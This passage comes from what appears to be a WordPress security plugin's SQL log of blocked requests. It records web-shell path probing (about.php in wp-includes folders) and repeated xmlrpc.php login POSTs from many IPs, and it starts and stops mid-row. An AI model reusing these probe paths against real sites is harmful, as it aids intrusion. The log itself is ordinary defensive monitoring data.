Safari\\/537.36\"}','6Han1ZDQksuUYL5o4wtAIvq3',0,1680965488.5244,304,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/block-patterns/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','m7nUKO29lzkafZP6QTqubJe3',0,1680965492.8484,280,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/block-supports/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','D2vkelWugcPfr6iJINS0j1Km',0,1680965494.1254,295,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/blocks/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Y2UszMWRjNThyFSdwv51ugKf',0,1680965496.5960,289,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/certificates/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','0mlOzNs3hIMLCFSJ5RxViEG1',0,1680965501.2913,279,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/css/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nsuvAS5dzPx7CN1WZmQ8I4jF',0,1680965507.6756,302,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/fonts/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','6k4VTvbIM3q9WgKnFL2AehSO',0,1680965511.8818,289,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/js/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','OtnfrqCXYRpy4JQTF0sl9VjL',0,1680965515.8810,340,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/php-compat/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','pixqbsneWCUjREg8Z0TGP4fc',0,1680965517.5797,354,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/random_compat/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ldT3SxpIAuDLm9JiMet0akUH',0,1680965518.7985,268,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/rest-api/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ugAY4RDzOGB82LcKC1Etr3Nv',0,1680965521.6829,294,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/sitemaps/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','7ztKmp4J8OWPMhIL2xSVRyfD',0,1680965522.7412,359,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/sodium_compat/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','WM8sgKf1lcXhj4F7TGzo3ADO',0,1680965530.5449,279,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/style-engine/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','oFNz0AnM8TtwHVriPcdQXvmp',0,1680965533.7642,610,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/theme-compat/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','AlILiS6KPVO4oU58a27uCyYe',0,1680965541.5036,317,'','GET',403,0,700,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-includes/widgets/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','NrYei1xEBCWq7cs0DPI3LUbp',0,1680965547.5051,295,'','GET',403,0,700,0,1,'',0),('91.231.84.41',1541887017,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Xp0h2Wmj5bIK9VleYTRqfrwk',0,1680965684.1800,880,'','POST',403,0,515,0,1,'',0),('185.151.196.183',3113731255,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','5IhX2RGPfVxzZA4qseBdbL19',0,1680968008.4711,1893,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','Mc4n0KEz8uLV6Dmf9XCStWZF',0,1680968018.1763,553,'','POST',403,0,515,0,1,'',0),('185.98.5.176',3110208944,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','KXcdI39SmsGLaypQzZU7wYFH',0,1680968020.8855,574,'','POST',403,0,515,0,1,'',0),('54.249.226.226',922346210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','5EA6eIbMtF14nDwUXzZq2u3c',0,1680968024.0580,577,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1PFmeugUV0qG52pZEKLcX3sY',0,1680968027.2942,621,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','XYr7LlIECKhuSekH6fZ35WBx',0,1680968036.1076,553,'','POST',403,0,515,0,1,'',0),('213.152.161.181',3583549877,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NVUS23JrhHyiCDMlILk9tb4u',0,1680968289.0576,668,'','POST',403,0,515,0,1,'',0),('185.156.175.35',3114053411,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZmAbfTXOr9FQWuks7gCnSdRh',0,1680969523.1803,4238,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','gaoFP2vBfh3HpMRyJ1086NbV',0,1680972637.7759,651,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','HkMZE8KXG3bvfir9jBTORJSn',0,1680972647.2075,603,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','2V5vo0H4R9GC3hSAmPn68egj',0,1680972656.6352,582,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','8H7lf2bit5hrCQjqFW46YeTK',0,1680972660.2875,572,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','QXTZWJlxrU0psuDo85iR2SKj',0,1680972667.5825,770,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','mNx4YderpqakglwOA8ZBQy0K',0,1680972668.2608,684,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','pithS75YNgQjAUdeoZaqBuK1',0,1680972674.0187,1455,'','POST',403,0,515,0,1,'',0),('54.249.226.226',922346210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','InvzPFAe5Ri9Qgh6KYkW4tXT',0,1680972939.4557,3667,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','xZoDlOCeWFVSpmaRwAkNBv5Y',0,1680972943.7227,553,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','OvID3rWJi6E0ZCgAVLNm7sBS',0,1680972951.4350,568,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','gnf6Ydo7QAIl8OqXr53DceNz',0,1680972956.6433,568,'','POST',403,0,515,0,1,'',0),('123.56.69.68',2067285316,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','cWUTGtzZDSLoe2d0IvE89npu',0,1680972961.4829,576,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','xLf1z6haiwEUZc8tCGoDWVjv',0,1680972967.3182,535,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5LH1CilDxsrFkEcKhIp3bWog',0,1680972981.9792,600,'','POST',403,0,515,0,1,'',0),('104.131.97.141',1753440653,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','XIpMobWYGiAuFSCQvqO08eLD',0,1680972985.8776,612,'','POST',403,0,515,0,1,'',0),('91.134.248.211',1535572179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','jMaNEBRbmqkC80DepLTX6OxA',0,1680972988.5618,599,'','POST',403,0,515,0,1,'',0),('62.102.148.156',1046910108,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YzEQ0Ko2OvbP75rIcSZNXyU8',0,1680973050.9456,1197,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','F5nSRO0t8lbQs4kArdqMcpZC',0,1680974850.7698,3972,'','POST',403,0,515,0,1,'',0),('200.58.112.82',3359273042,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','t6BrOsk217KxYdLEDGIWNPXF',0,1680974851.3592,4235,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','SdDlMqVoK8U09t3yzeCTbwr7',0,1680974857.6023,578,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','1TyMoQu0sd8vJCIS9VXmLHPn',0,1680974864.1863,533,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','EMiOhYwHU64kbaeZFNXRqVzW',0,1680974875.0880,567,'','POST',403,0,515,0,1,'',0),('95.111.252.99',1601174627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','CJIYHVZNuKdL1slSBp3eMk2w',0,1680974885.9711,566,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','MZevn6kH5yRmpqBcVNFX3iYb',0,1680974890.1299,556,'','POST',403,0,515,0,1,'',0),('79.170.40.178',1336551602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','0cFlPt5CzvXyIiHag6SfJj8K',0,1680974898.4588,692,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','K5q0JkYxWXa8Lw1RhuTrZp6v',0,1680974899.2574,563,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','1OWaC7FechyH82NzKoPGMut5',0,1680974905.4133,418,'','POST',404,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','UgGrt1mCauy6QS5MdnjHWcN0',0,1680974906.1562,550,'','POST',403,0,515,0,1,'',0),('199.249.223.130',3355041666,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','65wRkn9ShbQocyEvJ0sqFAY2',0,1680974989.1035,593,'','POST',403,0,515,0,1,'',0),('199.249.230.47',3355043375,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0xig3wZc1fO9HRXMEmlvt5rP',0,1680976333.4094,3949,'','POST',403,0,515,0,1,'',0),('173.44.55.179',2905356211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pOB7CiHTDnFRKgvJEj68xoPk',0,1680976711.6486,684,'','POST',403,0,515,0,1,'',0),('62.102.148.160',1046910112,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vwcDlLhRHiA05txX6uBN12pg',0,1680976736.0680,702,'','POST',403,0,515,0,1,'',0),('62.102.148.160',1046910112,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Fd0SlG4QusyZ3vPApKw5xJkT',0,1680977043.4862,615,'','POST',403,0,515,0,1,'',0),('184.75.221.195',3091979715,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7Pn0JjTquMCAlKXkh81ZE3O5',0,1680978196.1525,985,'','POST',403,0,515,0,1,'',0),('184.75.221.171',3091979691,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','93zPoL1kMu6dqyVc7x4siAfE',0,1680978525.2134,749,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','z9VqKPfyGEF3cYMiog4CTRDO',0,1680978576.0223,878,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','l30Da2bJMwGpExO1HuS5qTdv',0,1680978579.5392,553,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','MmQwGyN5h4APfJi9l1rcbq6C',0,1680978587.8124,563,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','BOZ2grCnGeELIPos93l4R6tu',0,1680978590.2467,1275,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','angiek80A3IDBE5JsfdN6cwl',0,1680978597.1042,577,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','na6sNA3uLZDOJgWw0tvixXMQ',0,1680978598.6542,568,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Y9wd5FaWqEhJCsvMRUSfm70V',0,1680978605.5043,713,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','WgphPmyEiOCYs1BZcMJ9RD5K',0,1680978612.4755,1188,'','POST',403,0,515,0,1,'',0),('43.159.34.32',731849248,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','M1D0QtO6A3J9prUiyXGNe2hZ',0,1680978612.8533,1081,'','POST',403,0,515,0,1,'',0),('104.37.86.31',1747277343,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','GsLM8CHo169NnqaW7DplVQuS',0,1680978616.1651,569,'','POST',403,0,515,0,1,'',0),('91.134.16.2',1535512578,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','6yno7L28MGisCB1pdc39qktU',0,1680978626.7014,580,'','POST',403,0,515,0,1,'',0),('146.70.61.147',2454076819,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jXFVJdHZDAMekOaCSxNgUzQo',0,1680979431.8960,1356,'','POST',403,0,515,0,1,'',0),('213.152.161.181',3583549877,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xnL7dXQ0sYODH9ozNMiteqrv',0,1680979649.8352,604,'','POST',403,0,515,0,1,'',0),('213.152.162.79',3583550031,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6ivXGlFrJx385dMyHps0SjVY',0,1680980349.8459,722,'','POST',403,0,515,0,1,'',0),('185.195.237.203',3116625355,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aFShRMWwE2CpvVDklH6LAJdo',0,1680981460.3370,2873,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/112.0.0.0 Safari\\/537.36 Edg\\/112.0.1722.34\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-plugin-upgrade&reauth=1\"}','W6UgcAjRTvCkxdBy8G2QzEpn',1,1680981541.6098,499,'','POST',302,0,600,0,1,'',510),('185.195.237.203',3116625355,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8mCWu76FTUcjBsfqo2DbXlNw',0,1680981913.3149,2660,'','POST',403,0,515,0,1,'',0),('37.120.210.211',628675283,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 